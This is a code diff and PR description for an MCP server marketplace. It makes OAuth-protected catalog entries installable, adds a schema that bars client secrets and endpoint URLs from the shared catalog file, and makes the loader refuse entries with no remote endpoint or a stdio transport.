+    ).toBe(false);
+  });
+
+  it('keeps oauth, which connects and then asks the user to sign in', () => {
+    expect(isConnectable(entry({ auth_type: 'oauth' }))).toBe(true);
+  });
+
+  it('still excludes a local oauth server — no endpoint to sign into', () => {
+    expect(
+      isConnectable(
+        entry({ auth_type: 'oauth', transport: 'stdio', has_remote: false, remote_url: undefined })
+      )
     ).toBe(false);
   });
 

--- a/apps/agor-ui/src/components/Marketplace/catalogPresentation.test.ts
+++ b/apps/agor-ui/src/components/Marketplace/catalogPresentation.test.ts
@@ -61,10 +61,12 @@ describe('connectBlockedReason', () => {
     expect(connectBlockedReason(entry({ auth_type: 'unknown' }))).toBeUndefined();
   });
 
-  it('refuses a locally-run server', () => {
+  it('refuses an entry with no endpoint to dial', () => {
+    // Unreachable for anything the loader served — it refuses such an entry
+    // outright now — but these arrive over the wire, so the UI still answers.
     expect(
       connectBlockedReason(entry({ transport: 'stdio', has_remote: false, remote_url: undefined }))
-    ).toMatch(/runs locally/i);
+    ).toMatch(/cannot be installed/i);
   });
 
   it('allows oauth: connecting sets it up and the user signs in afterwards', () => {
@@ -95,7 +97,7 @@ describe('connectStatus', () => {
       connectStatus(entry({ transport: 'stdio', has_remote: false, remote_url: undefined }))
     ).toMatchObject({
       readiness: 'blocked',
-      label: 'Runs locally',
+      label: 'Not installable',
     });
     expect(connectStatus(entry({ auth_type: 'credentials' }))).toMatchObject({
       readiness: 'blocked',
@@ -131,7 +133,7 @@ describe('isConnectable', () => {
     expect(isConnectable(entry({ auth_type: 'oauth' }))).toBe(true);
   });
 
-  it('still excludes a local oauth server — no endpoint to sign into', () => {
+  it('still excludes an endpoint-less oauth entry — nothing to sign into', () => {
     expect(
       isConnectable(
         entry({ auth_type: 'oauth', transport: 'stdio', has_remote: false, remote_url: undefined })

--- a/apps/agor-ui/src/components/Marketplace/catalogPresentation.ts
+++ b/apps/agor-ui/src/components/Marketplace/catalogPresentation.ts
@@ -140,11 +140,28 @@ export interface ConnectStatus {
 }
 
 const CONNECT_STATUSES = {
-  local: {
+  /**
+   * An entry with no endpoint to dial.
+   *
+   * This used to read "Runs locally — an admin configures it directly", which
+   * described a capability that does not exist: the two entries it applied to
+   * carried no package or command data either, so there was no path to
+   * installing them for an admin or anyone else. The copy is gone with them,
+   * and the loader now refuses such an entry outright
+   * (`assertEntryIsServable`), so nothing served can reach this.
+   *
+   * The branch stays because `MCPCatalogEntry.remote_url` is optional and these
+   * entries arrive over the wire — the UI does not get to assume the loader
+   * that produced them was this one. What it must not do is describe the entry
+   * as a working feature; it says the marketplace cannot install it, which is
+   * true whatever produced it. If local servers are ever offered they arrive
+   * with fields describing how the server is run, and an affordance designed
+   * against those — not this string.
+   */
+  unavailable: {
     readiness: 'blocked',
-    label: 'Runs locally',
-    detail:
-      'This server runs locally rather than over the network. An admin configures it directly.',
+    label: 'Not installable',
+    detail: 'This entry names no endpoint to connect to, so it cannot be installed.',
   },
   signIn: {
     readiness: 'sign-in',
@@ -189,7 +206,8 @@ export const CONNECTABLE_AUTH_TYPES: MCPCatalogAuthType[] = ['none', 'oauth', 'u
 
 export function connectStatus(entry: MCPCatalogEntry): ConnectStatus {
   // `has_remote` is derived from `remote_url`, so testing the URL tests both.
-  if (!entry.remote_url || entry.transport === 'stdio') return CONNECT_STATUSES.local;
+  // Unreachable for anything the loader served; see `unavailable` above.
+  if (!entry.remote_url || entry.transport === 'stdio') return CONNECT_STATUSES.unavailable;
   if (entry.auth_type === 'credentials') return CONNECT_STATUSES.needsKey;
   if (entry.auth_type === 'oauth') return CONNECT_STATUSES.signIn;
   if (entry.auth_type !== 'none') return CONNECT_STATUSES.unchecked;

--- a/apps/agor-ui/src/components/Marketplace/catalogPresentation.ts
+++ b/apps/agor-ui/src/components/Marketplace/catalogPresentation.ts
@@ -117,15 +117,19 @@ export const entryTitle = catalogDisplayName;
 /**
  * What a user would find out by pressing Connect, said before they press it.
  *
- * Only the no-auth branch is wired, and most entries need an account — so
- * without this the default experience is accepting a disclosure and then being
- * refused. `unknown` is its own case rather than being folded into either side:
+ * `unknown` is its own case rather than being folded into either side:
  * connecting checks the endpoint and may well succeed, but an entry that does
  * not say cannot promise it will. It is what an entry naming an endpoint and
  * stating no `auth_type` reads as, which is what curation is told to write
  * wherever nobody has established one.
+ *
+ * `sign-in` is separate from `ready` for the same reason: both connect, but one
+ * of them lands the user on a server they still have to sign into, and a card
+ * promising "no account needed" for a server that needs their Notion account is
+ * the promise this vocabulary exists to keep. It is not `blocked` — the sign-in
+ * happens, it just happens after connecting rather than instead of it.
  */
-export type ConnectReadiness = 'ready' | 'unchecked' | 'blocked';
+export type ConnectReadiness = 'ready' | 'sign-in' | 'unchecked' | 'blocked';
 
 export interface ConnectStatus {
   readiness: ConnectReadiness;
@@ -142,10 +146,16 @@ const CONNECT_STATUSES = {
     detail:
       'This server runs locally rather than over the network. An admin configures it directly.',
   },
-  needsAccount: {
+  signIn: {
+    readiness: 'sign-in',
+    label: 'Sign in after connecting',
+    detail:
+      'This server uses your own account. Connecting sets it up, then you sign in from the session — nobody signs in on your behalf.',
+  },
+  needsKey: {
     readiness: 'blocked',
-    label: 'Needs an account',
-    detail: 'This server needs an account. Signing in from the marketplace is not available yet.',
+    label: 'Needs an API key',
+    detail: 'This server needs an API key. Adding one from the marketplace is not available yet.',
   },
   unchecked: {
     readiness: 'unchecked',
@@ -163,22 +173,25 @@ const CONNECT_STATUSES = {
 /**
  * Auth types that are not a refusal.
  *
- * The same rule the cards state: `none` is stated open, and `unknown` is simply
- * unstated — connecting checks the endpoint and stops cleanly if it turns out
- * to need an account. An entry that says nothing is worth offering, so a filter
- * demanding `none` would hide entries the card beside it called connectable.
+ * The same rule the cards state: `none` is stated open, `oauth` signs the user
+ * in with their own account after connecting, and `unknown` is simply unstated
+ * — connecting checks the endpoint and stops cleanly if it turns out to want an
+ * API key. An entry that says nothing is worth offering, so a filter demanding
+ * `none` would hide entries the card beside it called connectable.
+ *
+ * `credentials` is the one that stays out: nothing can obtain an API key on the
+ * user's behalf, and there is nowhere to put one they typed.
  *
  * Exported so the toolbar's filter and `connectStatus` cannot drift into
  * disagreeing about what "connectable" means.
  */
-export const CONNECTABLE_AUTH_TYPES: MCPCatalogAuthType[] = ['none', 'unknown'];
+export const CONNECTABLE_AUTH_TYPES: MCPCatalogAuthType[] = ['none', 'oauth', 'unknown'];
 
 export function connectStatus(entry: MCPCatalogEntry): ConnectStatus {
   // `has_remote` is derived from `remote_url`, so testing the URL tests both.
   if (!entry.remote_url || entry.transport === 'stdio') return CONNECT_STATUSES.local;
-  if (entry.auth_type === 'oauth' || entry.auth_type === 'credentials') {
-    return CONNECT_STATUSES.needsAccount;
-  }
+  if (entry.auth_type === 'credentials') return CONNECT_STATUSES.needsKey;
+  if (entry.auth_type === 'oauth') return CONNECT_STATUSES.signIn;
   if (entry.auth_type !== 'none') return CONNECT_STATUSES.unchecked;
   return CONNECT_STATUSES.ready;
 }

--- a/packages/core/src/mcp-catalog/curated-loader.test.ts
+++ b/packages/core/src/mcp-catalog/curated-loader.test.ts
@@ -261,3 +261,88 @@ describe('loadCuratedCatalog', () => {
     expect(open.length).toBeGreaterThanOrEqual(3);
   });
 });
+
+/**
+ * The `oauth:` block: what an entry may state about a server's sign-in flow.
+ *
+ * The block exists for servers that fall short of the MCP authorization spec's
+ * discovery chain. Everything a compliant server publishes about itself is
+ * fetched at the moment somebody signs in, so the shipped catalog states none
+ * of this — an authored fact about a third party's endpoint decays and nothing
+ * sweeps this file for rot.
+ */
+describe('parseCuratedCatalog — oauth settings', () => {
+  const withOAuth = (block: string) => `
+entries:
+  - name: com.example/mcp
+    category: dev-tools
+    capabilities: [issues]
+    benefit: Does a useful thing.
+    starter_prompt: Try the useful thing.
+    permission_disclosure: Reads your issues.
+    auth_type: oauth
+    oauth:
+${block}
+`;
+
+  it('accepts the settings a server may need stated', () => {
+    const [entry] = parseCuratedCatalog(
+      withOAuth(`      scope: read:issues write:issues
+      client_id: public-client-123
+      dcr_mode: fallback
+      compatibility_mode: legacy`)
+    );
+
+    expect(entry.oauth).toEqual({
+      scope: 'read:issues write:issues',
+      client_id: 'public-client-123',
+      dcr_mode: 'fallback',
+      compatibility_mode: 'legacy',
+    });
+  });
+
+  it.each([
+    ['client_secret', '      client_secret: sh-hunter2'],
+    ['token_url', '      token_url: https://example.com/token'],
+    ['authorization_url', '      authorization_url: https://example.com/authorize'],
+  ])('refuses %s, which does not belong in a public shared file', (_field, block) => {
+    // A client secret here is a published secret shared by every tenant. The
+    // two URLs are where an authorization code and a client credential get
+    // sent, so a stale one delivers a live grant to whatever now answers there
+    // — and they are the facts discovery is most reliable about. Failing the
+    // load is the point: a dropped key would be a silent leak.
+    expect(() => parseCuratedCatalog(withOAuth(block))).toThrow(CuratedCatalogError);
+  });
+
+  it('refuses an empty block, so absence is the only way to say "discover it"', () => {
+    expect(() => parseCuratedCatalog(withOAuth('      {}'))).toThrow(CuratedCatalogError);
+  });
+
+  it('refuses a mode it would silently ignore', () => {
+    expect(() => parseCuratedCatalog(withOAuth('      dcr_mode: whatever'))).toThrow(
+      CuratedCatalogError
+    );
+  });
+
+  it('leaves the block absent when an entry states nothing', () => {
+    const [entry] = parseCuratedCatalog(VALID_ENTRY);
+    expect(entry.oauth).toBeUndefined();
+  });
+});
+
+describe('the shipped catalog', () => {
+  it('states no oauth settings, because discovery covers every entry', async () => {
+    // Not a style rule: each of these is an authored claim about somebody
+    // else's endpoint that nothing in the running system can contradict, so an
+    // entry acquiring one should be a deliberate, reviewed exception rather
+    // than something that accumulates. Delete this expectation with the PR that
+    // adds the first justified one.
+    const entries = await loadCuratedCatalog();
+    expect(entries.filter((entry) => entry.oauth !== undefined)).toEqual([]);
+  });
+
+  it('carries no secret-shaped value anywhere in the file', async () => {
+    const source = await fs.readFile(curatedCatalogPath(), 'utf-8');
+    expect(source).not.toMatch(/client_secret|token_url|authorization_url|api[_-]?key/i);
+  });
+});

--- a/packages/core/src/mcp-catalog/curated-loader.test.ts
+++ b/packages/core/src/mcp-catalog/curated-loader.test.ts
@@ -9,6 +9,8 @@ import {
   parseCuratedCatalog,
 } from './curated-loader';
 
+// Names an endpoint because the loader now refuses an entry that does not:
+// see `parseCuratedCatalog — entries nothing could install`.
 const VALID_ENTRY = `
 entries:
   - name: com.example/mcp
@@ -17,6 +19,7 @@ entries:
     benefit: Does a useful thing.
     starter_prompt: Try the useful thing.
     permission_disclosure: Reads your repositories.
+    remote_url: https://mcp.example.com/mcp
     popularity_rank: 1
 `;
 
@@ -30,6 +33,7 @@ entries:
     benefit: Searches.
     starter_prompt: Search something.
     permission_disclosure: Sends queries to the provider.
+    remote_url: https://mcp.example.com/mcp
 `);
 
     expect(entry.name).toBe('com.example/mcp');
@@ -92,6 +96,7 @@ entries:
     benefit: Real.
     starter_prompt: Do it.
     permission_disclosure: Reads repos.
+    remote_url: https://mcp.published.com/mcp
     popularity_rank: 1
 unpublished:
   - name: ${name}
@@ -100,6 +105,7 @@ unpublished:
     benefit: Guessed.
     starter_prompt: Do it.
     permission_disclosure: Reads repos.
+    remote_url: https://mcp.guessed.com/mcp
     popularity_rank: ${rank}
 `;
 
@@ -148,11 +154,14 @@ describe('auth_type', () => {
 
 describe('has_remote', () => {
   it('is derived from the endpoint rather than stated alongside it', () => {
-    expect(parseCuratedCatalog(VALID_ENTRY)[0].has_remote).toBe(false);
-    const withRemote = parseCuratedCatalog(
-      `${VALID_ENTRY}    remote_url: https://mcp.example.com/mcp\n    transport: streamable-http\n`
-    );
-    expect(withRemote[0].has_remote).toBe(true);
+    // Only ever true now — an entry without an endpoint fails the load — so
+    // what is left to hold is that it is still *derived*, never authored. A
+    // file that could state `has_remote: true` beside no `remote_url` would
+    // offer a Connect button with nothing behind it.
+    expect(parseCuratedCatalog(VALID_ENTRY)[0].has_remote).toBe(true);
+    expect(() =>
+      parseCuratedCatalog(VALID_ENTRY.replace('    remote_url: https://mcp.example.com/mcp\n', ''))
+    ).toThrow(CuratedCatalogError);
   });
 });
 
@@ -228,26 +237,22 @@ describe('loadCuratedCatalog', () => {
       expect(entry.remote_url).toMatch(/^https:\/\//);
     }
 
-    // The catalog is a browse surface for servers users can connect, so most of
-    // it has to name an endpoint. The remainder are package-only servers with
-    // no remote to record, which the marketplace shows as running locally.
-    const withRemote = entries.filter((entry) => entry.remote_url).length;
-    expect(withRemote / entries.length).toBeGreaterThan(0.8);
+    // Not "most of it" any more: the catalog is a browse surface for servers
+    // users can connect, and an entry nothing can install is a dead card. The
+    // loader enforces this; asserting it here keeps the shipped file honest
+    // even if that rule is ever loosened.
+    expect(entries.filter((entry) => !entry.remote_url)).toEqual([]);
   });
 
   it('states an auth type for every entry with an endpoint, and none without', async () => {
     const entries = await loadCuratedCatalog();
 
     for (const entry of entries) {
-      if (entry.remote_url) {
-        // An unstated endpoint still works — connecting checks it — but it
-        // makes the marketplace say "not checked yet" about a server somebody
-        // could have checked once, for everyone, in a pull request.
-        expect(entry.auth_type, `${entry.name} states no auth_type`).not.toBe('unknown');
-      } else {
-        // Nothing to dial, so there is nothing to state.
-        expect(entry.auth_type, `${entry.name} has no endpoint`).toBe('unknown');
-      }
+      // Every entry names an endpoint now, so every entry owes an auth_type.
+      // An unstated one still works — connecting checks it — but it makes the
+      // marketplace say "not checked yet" about a server somebody could have
+      // checked once, for everyone, in a pull request.
+      expect(entry.auth_type, `${entry.name} states no auth_type`).not.toBe('unknown');
     }
   });
 
@@ -280,6 +285,7 @@ entries:
     benefit: Does a useful thing.
     starter_prompt: Try the useful thing.
     permission_disclosure: Reads your issues.
+    remote_url: https://mcp.example.com/mcp
     auth_type: oauth
     oauth:
 ${block}
@@ -344,5 +350,98 @@ describe('the shipped catalog', () => {
   it('carries no secret-shaped value anywhere in the file', async () => {
     const source = await fs.readFile(curatedCatalogPath(), 'utf-8');
     expect(source).not.toMatch(/client_secret|token_url|authorization_url|api[_-]?key/i);
+  });
+});
+
+/**
+ * Entries the marketplace could render but never install.
+ *
+ * Two shipped: metadata-only rows that drew a card, a category and a Connect
+ * affordance where every route out was a refusal. Nothing objected — not the
+ * schema, not the loader, not a test — which is why the rule is here rather
+ * than left to a reviewer noticing.
+ */
+describe('parseCuratedCatalog — entries nothing could install', () => {
+  const base = `
+    category: dev-tools
+    capabilities: [issues]
+    benefit: Does a useful thing.
+    starter_prompt: Try the useful thing.
+    permission_disclosure: Reads your issues.`;
+
+  it('refuses an entry naming no endpoint', () => {
+    expect(() =>
+      parseCuratedCatalog(`
+entries:
+  - name: com.example/mcp${base}
+`)
+    ).toThrow(CuratedCatalogError);
+  });
+
+  it('tells a curator which entry, what is wrong, and how to fix it', () => {
+    // This message is the whole point: the next dozen entries are hand-written,
+    // and a curator meets this before a user meets a dead card.
+    let message = '';
+    try {
+      parseCuratedCatalog(`
+entries:
+  - name: com.example/mcp${base}
+`);
+    } catch (error) {
+      message = error instanceof Error ? error.message : String(error);
+    }
+    expect(message).toContain('com.example/mcp');
+    expect(message).toMatch(/remote_url/);
+    expect(message).toMatch(/or remove the entry/);
+  });
+
+  it('refuses a stdio entry, which connect refuses too', () => {
+    expect(() =>
+      parseCuratedCatalog(`
+entries:
+  - name: com.example/mcp${base}
+    remote_url: https://mcp.example.com/mcp
+    transport: stdio
+`)
+    ).toThrow(/stdio/);
+  });
+
+  it('fails the whole file, matching how every other invariant behaves', () => {
+    // Not "skip the bad entry": a partially-served catalog is one a reviewer
+    // cannot see the shape of, and the file is checked in, so failing it is
+    // something CI catches before any user does.
+    expect(() =>
+      parseCuratedCatalog(`
+entries:
+  - name: com.good/mcp${base}
+    remote_url: https://mcp.good.com/mcp
+  - name: com.bad/mcp${base}
+`)
+    ).toThrow(CuratedCatalogError);
+  });
+
+  it('accepts an entry that names an endpoint and no transport', () => {
+    // The default is remote; only `stdio` is the uninstallable one.
+    const [entry] = parseCuratedCatalog(`
+entries:
+  - name: com.example/mcp${base}
+    remote_url: https://mcp.example.com/mcp
+`);
+    expect(entry.has_remote).toBe(true);
+  });
+});
+
+describe('the shipped catalog — everything on the shelf can be taken off it', () => {
+  it('names an endpoint for every entry', async () => {
+    const entries = await loadCuratedCatalog();
+    expect(entries.filter((entry) => !entry.remote_url)).toEqual([]);
+    expect(entries.every((entry) => entry.has_remote)).toBe(true);
+  });
+
+  it('declares no stdio entry', async () => {
+    // Local servers are declined, not deferred: running a packaged server means
+    // executing third-party code on the executor host, beside every session.
+    const entries = await loadCuratedCatalog();
+    expect(entries.filter((entry) => entry.transport === 'stdio')).toEqual([]);
   });
 });

--- a/packages/core/src/mcp-catalog/curated-loader.ts
+++ b/packages/core/src/mcp-catalog/curated-loader.ts
@@ -14,6 +14,8 @@ import {
   MCP_CATALOG_AUTHORED_AUTH_TYPES,
   MCP_CATALOG_CAPABILITIES,
   MCP_CATALOG_CATEGORIES,
+  MCP_OAUTH_COMPATIBILITY_MODES,
+  MCP_OAUTH_DCR_MODES,
 } from '@agor/core/types';
 import { z } from 'zod';
 import { load as loadYaml } from '../yaml';
@@ -42,6 +44,33 @@ const httpUrl = z.url().refine((value) => /^https?:\/\//i.test(value), {
   message: 'must be an http(s) URL',
 });
 
+/**
+ * The per-server OAuth settings an entry may state.
+ *
+ * `.strict()` is what keeps a secret out. The obvious mistake this file invites
+ * is pasting a whole OAuth client configuration into an entry, and the
+ * dangerous halves of one — `client_secret`, `token_url`, `authorization_url` —
+ * are exactly the keys someone would reach for. Under `.strict()` any of them
+ * fails the load loudly at review time and at daemon start, rather than being
+ * dropped in silence: a published client secret that nobody was told about is
+ * strictly worse than a catalog that will not parse. See
+ * {@link MCPCatalogEntryOAuth} for why each accepted key is accepted.
+ */
+const catalogEntryOAuthSchema = z
+  .object({
+    scope: nonEmpty.optional(),
+    client_id: nonEmpty.optional(),
+    dcr_mode: z.enum(MCP_OAUTH_DCR_MODES).optional(),
+    compatibility_mode: z.enum(MCP_OAUTH_COMPATIBILITY_MODES).optional(),
+  })
+  .strict()
+  // An `oauth: {}` that states nothing is a reviewer's leftover, and it reads
+  // as though something was configured. Absence is how an entry says "discover
+  // it all", and there should be exactly one way to say that.
+  .refine((value) => Object.values(value).some((field) => field !== undefined), {
+    message: 'must state at least one setting, or be omitted entirely',
+  });
+
 const catalogEntrySchema = z
   .object({
     name: nonEmpty,
@@ -62,6 +91,14 @@ const catalogEntrySchema = z
      * established it: absence is read as "not stated", never as "open".
      */
     auth_type: z.enum(MCP_CATALOG_AUTHORED_AUTH_TYPES).optional(),
+    /**
+     * Settings for the OAuth flow, used when connecting finds the endpoint
+     * wants one. Not gated on `auth_type`: the probe decides what an endpoint
+     * requires, so an entry stating `none` that has since been put behind an
+     * account still gets these, and an entry stating `oauth` that has been
+     * opened up simply never uses them.
+     */
+    oauth: catalogEntryOAuthSchema.optional(),
   })
   .strict();
 

--- a/packages/core/src/mcp-catalog/curated-loader.ts
+++ b/packages/core/src/mcp-catalog/curated-loader.ts
@@ -120,6 +120,55 @@ export function curatedCatalogPath(): string {
 }
 
 /**
+ * Refuse an entry the marketplace could offer but never install.
+ *
+ * The condition is connect's own: `assertConnectableEntry` refuses anything
+ * without a `remote_url`, and anything declaring `stdio`. An entry failing that
+ * is not a lesser entry, it is an unusable one — it renders a card, a category,
+ * a disclosure and a Connect affordance, and every route out of that card is a
+ * refusal. Two such entries shipped, and nothing in the file, the loader, or
+ * the tests objected; the marketplace simply had two shelves nobody could take
+ * anything off. That silence is the defect this closes. The rule is stated here
+ * so a file that cannot work fails where a curator is looking, rather than
+ * per-user at the point of pressing Connect.
+ *
+ * This does not replace connect's check, which stays. The loader constrains the
+ * checked-in file; connect authorizes a request, and the remote-only rule it
+ * enforces is a security boundary — `stdio` names a command the executor runs on
+ * its host, next to every session. A boundary that held only because an input
+ * file had been validated somewhere else would be one bad catalog source away
+ * from not holding at all.
+ *
+ * Local servers are not deferred by this, they are declined. Installing a
+ * package-based entry means executing third-party code on the executor host,
+ * which is a supply-chain decision rather than a credential one, and it is the
+ * risk the members-remote-only rule exists to contain. Whatever eventually
+ * offers local servers has to answer that question first, and will need its own
+ * fields to describe how the thing is run — the two removed entries carried
+ * none, because the package data that would have described them lived in the
+ * registry mirror. So this is not a rule to relax when local support lands; it
+ * is a rule that will be replaced by one that knows what it is admitting.
+ */
+function assertEntryIsServable(entry: {
+  name: string;
+  remote_url?: string;
+  transport?: MCPCatalogTransport;
+}): void {
+  if (entry.transport === 'stdio') {
+    throw new CuratedCatalogError(
+      `curated.yaml entry ${entry.name} declares transport: stdio, which the marketplace cannot install. ` +
+        'Give it the vendor\'s remote endpoint and a remote transport ("streamable-http" or "sse"), or remove the entry.'
+    );
+  }
+  if (!entry.remote_url) {
+    throw new CuratedCatalogError(
+      `curated.yaml entry ${entry.name} names no remote_url, so nothing could ever install it. ` +
+        'Add the vendor\'s remote MCP endpoint (and transport: "streamable-http" or "sse" if it is not the default), or remove the entry.'
+    );
+  }
+}
+
+/**
  * Parse the catalog file.
  *
  * Both top-level lists are one catalog: every entry in either is offered. The
@@ -132,6 +181,9 @@ export function curatedCatalogPath(): string {
  * Rejects duplicate `name`s and duplicate `popularity_rank`s across both lists:
  * either would make the marketplace's ordering depend on file order, which is
  * not something a reviewer can see in a diff.
+ *
+ * Rejects entries the catalog could never serve: see
+ * {@link assertEntryIsServable}.
  */
 export function parseCuratedCatalog(source: string): MCPCatalogEntry[] {
   let document: unknown;
@@ -156,6 +208,8 @@ export function parseCuratedCatalog(source: string): MCPCatalogEntry[] {
   const seenNames = new Set<string>();
   const seenRanks = new Map<number, string>();
   for (const entry of parsedEntries) {
+    assertEntryIsServable(entry);
+
     if (seenNames.has(entry.name)) {
       throw new CuratedCatalogError(`curated.yaml has duplicate entry name: ${entry.name}`);
     }
@@ -177,6 +231,12 @@ export function parseCuratedCatalog(source: string): MCPCatalogEntry[] {
     // Derived rather than stated: an entry is dialable exactly when it names an
     // endpoint, and a file that could disagree with itself about that would
     // offer a Connect button with nothing to connect to.
+    //
+    // Now always true, because {@link assertEntryIsServable} has already
+    // refused the file otherwise. Kept as a derivation rather than hardcoded:
+    // it states the reason a served entry is dialable, and it is what the
+    // consumers of `MCPCatalogEntry` — which still types `remote_url` as
+    // optional — read instead of re-deriving it.
     has_remote: Boolean(entry.remote_url),
     auth_type: entry.auth_type ?? 'unknown',
   }));

--- a/packages/core/src/mcp-catalog/curated.yaml
+++ b/packages/core/src/mcp-catalog/curated.yaml
@@ -109,15 +109,6 @@ entries:
     transport: streamable-http
     auth_type: oauth
 
-  - name: com.auth0/mcp
-    category: dev-tools
-    capabilities: [deployments, logs]
-    benefit: Inspect and configure Auth0 tenants from the session instead of clicking through the dashboard.
-    starter_prompt: List the applications in my Auth0 tenant and flag any with an unusually permissive callback URL.
-    permission_disclosure: Reads and writes application, connection, and tenant configuration in the Auth0 tenants you authorise.
-    icon_url: https://www.google.com/s2/favicons?domain=auth0.com&sz=64
-    popularity_rank: 38
-
   - name: com.wix/mcp
     category: dev-tools
     capabilities: [deployments, content-cms]
@@ -166,15 +157,6 @@ entries:
     remote_url: https://mcp.airtable.com/mcp
     transport: streamable-http
     auth_type: oauth
-
-  - name: io.github.ClickHouse/mcp-clickhouse
-    category: data-storage
-    capabilities: [sql, analytics, schema]
-    benefit: Query ClickHouse directly so an agent can answer analytical questions instead of guessing at them.
-    starter_prompt: Describe my ClickHouse tables and run a query summarising events over the last seven days.
-    permission_disclosure: Runs SQL against the ClickHouse cluster you configure, with whatever access its credentials carry.
-    icon_url: https://www.google.com/s2/favicons?domain=clickhouse.com&sz=64
-    popularity_rank: 30
 
   - name: co.huggingface/hf-mcp-server
     category: data-storage

--- a/packages/core/src/types/mcp-catalog.ts
+++ b/packages/core/src/types/mcp-catalog.ts
@@ -9,7 +9,7 @@
 // authored text plus the transport details needed to dial the server.
 
 import type { AgenticToolName } from './agentic-tool';
-import type { MCPServer } from './mcp';
+import type { MCPOAuthCompatibilityMode, MCPOAuthDCRMode, MCPServer } from './mcp';
 import type { Session } from './session';
 
 /**
@@ -162,6 +162,74 @@ export interface MCPCatalogEntry {
   popularity_rank?: number;
 
   auth_type: MCPCatalogAuthType;
+
+  /**
+   * Per-server OAuth settings, for the endpoints discovery cannot fully
+   * describe. See {@link MCPCatalogEntryOAuth}. Omitted by every entry that
+   * does not need one, which is the intended state.
+   */
+  oauth?: MCPCatalogEntryOAuth;
+}
+
+/**
+ * The non-secret half of an OAuth client configuration, as an entry may state
+ * it.
+ *
+ * Everything here is optional and nothing here is normally needed. A server
+ * that implements the MCP authorization spec is set up entirely from what it
+ * publishes: the `WWW-Authenticate` challenge names its protected-resource
+ * metadata (RFC 9728), that names its authorization server, that publishes its
+ * endpoints and registration endpoint (RFC 8414), and Dynamic Client
+ * Registration (RFC 7591) mints the client. Connect declares none of that, and
+ * every entry in `curated.yaml` today states nothing here, because a fact
+ * fetched from the vendor at the moment of use cannot go stale and an authored
+ * one silently can — and nothing sweeps this file for rot.
+ *
+ * So this is an escape hatch for the servers that fall short of that, not a
+ * place to restate what discovery already returns. Each field is here because
+ * it reaches something at runtime that no request can otherwise supply:
+ *
+ * - `scope` becomes the `scope` parameter of the authorization request and of
+ *   the DCR registration. Discovery covers it only when the resource metadata
+ *   publishes `scopes_supported` *and* the client is being registered
+ *   dynamically; a server that publishes neither grants a default scope that
+ *   may be empty, and the flow completes with a token that can do nothing.
+ * - `client_id` becomes the `client_id` of the authorization request, for a
+ *   server that pre-registers one public client for MCP clients instead of
+ *   running DCR. It is public by construction — RFC 6749 §2.2, and it travels
+ *   in the browser's address bar during the flow.
+ * - `dcr_mode` decides whether registration may fall back to an unadvertised
+ *   `/register`, for a server that runs DCR without publishing the endpoint.
+ * - `compatibility_mode` decides whether authorization-server metadata may be
+ *   fetched straight from the MCP origin, for a server that predates RFC 9728.
+ *
+ * What is deliberately absent is as load-bearing as what is here:
+ *
+ * - **No client secret.** `curated.yaml` is checked into a public repository
+ *   and is byte-identical for every tenant, so a secret in it is a published
+ *   secret shared by everyone. A server that cannot work without a confidential
+ *   client cannot be a catalog entry.
+ * - **No `authorization_url` / `token_url`.** These are where an authorization
+ *   code and a client credential are sent, so a stale one does not fail closed
+ *   — it delivers a live grant to whatever now answers at that hostname. They
+ *   are also the two facts discovery is most reliable about, and the runtime
+ *   requires them as a set with `client_id` anyway. Declaring them would take
+ *   the one part of the flow that must not drift and make it the part this file
+ *   is responsible for keeping current.
+ *
+ * None of this is user-specific: an entry is the same for every installer, and
+ * the credential each installer obtains is per-user and lives outside the
+ * server row entirely.
+ */
+export interface MCPCatalogEntryOAuth {
+  /** Space-separated OAuth scopes to request. */
+  scope?: string;
+  /** A pre-registered *public* client id. Never a confidential one. */
+  client_id?: string;
+  /** Dynamic Client Registration policy; defaults to `advertised`. */
+  dcr_mode?: MCPOAuthDCRMode;
+  /** Authorization-metadata discovery strictness; defaults to `strict`. */
+  compatibility_mode?: MCPOAuthCompatibilityMode;
 }
 
 /**

--- a/packages/core/src/types/mcp.ts
+++ b/packages/core/src/types/mcp.ts
@@ -53,7 +53,23 @@ export interface MCPOAuthRefreshResult {
 
 /** Credential subject selected for the resulting MCP OAuth grant. */
 export type MCPOAuthMode = 'per_user' | 'shared';
-export type MCPOAuthDCRMode = 'disabled' | 'advertised' | 'fallback';
+
+/**
+ * Dynamic Client Registration policy.
+ *
+ * A value array rather than a bare union because the catalog loader validates
+ * this field out of a YAML file, and a `z.enum` built from the type is the only
+ * arrangement in which the accepted strings cannot drift from the ones
+ * {@link MCPAuth.oauth_dcr_mode} is declared to hold.
+ */
+export const MCP_OAUTH_DCR_MODES = ['disabled', 'advertised', 'fallback'] as const;
+
+export type MCPOAuthDCRMode = (typeof MCP_OAUTH_DCR_MODES)[number];
+
+/** Strictness of OAuth authorization-metadata discovery. See {@link MCP_OAUTH_DCR_MODES}. */
+export const MCP_OAUTH_COMPATIBILITY_MODES = ['strict', 'legacy'] as const;
+
+export type MCPOAuthCompatibilityMode = (typeof MCP_OAUTH_COMPATIBILITY_MODES)[number];
 
 /**
  * Safe diagnostics for a failed OAuth Dynamic Client Registration attempt.
@@ -221,7 +237,7 @@ export interface MCPAuth {
   oauth_scope?: string;
   oauth_grant_type?: string;
   /** Strict current MCP Authorization behavior is the default. */
-  oauth_compatibility_mode?: 'strict' | 'legacy';
+  oauth_compatibility_mode?: MCPOAuthCompatibilityMode;
   /**
    * Dynamic Client Registration policy. Missing values use `advertised` for
    * compatibility with servers that publish an RFC 7591 endpoint. The


### PR DESCRIPTION
Stacks on #2344 (`mcp-catalog-file-backed`). **Base is `mcp-catalog-file-backed`, not `main`.**

Two things, same files and same principle: **everything on the shelf can be taken off it.**

1. Entries whose endpoint answers with an OAuth challenge become installable — the row is created configured-but-unauthenticated and the user signs in through the existing flow.
2. The two entries nothing could ever install are removed, and the loader now refuses to load a file containing one.

**48 entries, 47 installable.** The one exception wants an API key (`com.datadoghq/mcp`). Before this PR: 50 entries, 5 installable.

---

# Part 1 — auto mode

The marketplace refused 45 of 50 with *"requires authentication, which is not supported yet"*. 42 of those answer an unauthenticated `initialize` with an OAuth challenge, which is authentication Agor already knows how to complete.

Connecting one now creates the server row **configured for OAuth and holding no token**, and the user signs in from Settings → MCP Servers. Connect does not authenticate anybody and does not start the flow — it produces the row that flow finishes.

## The row is nearly empty, on purpose

A server implementing the MCP authorization spec describes its own flow at the moment the flow runs: the `WWW-Authenticate` challenge names its protected-resource metadata (RFC 9728), that names its authorization server, that publishes its endpoints and registration endpoint (RFC 8414), and Dynamic Client Registration (RFC 7591) mints the client. `oauth-start` reads only `url`, `enabled`, and `auth.type === 'oauth'` off the row. So:

```ts
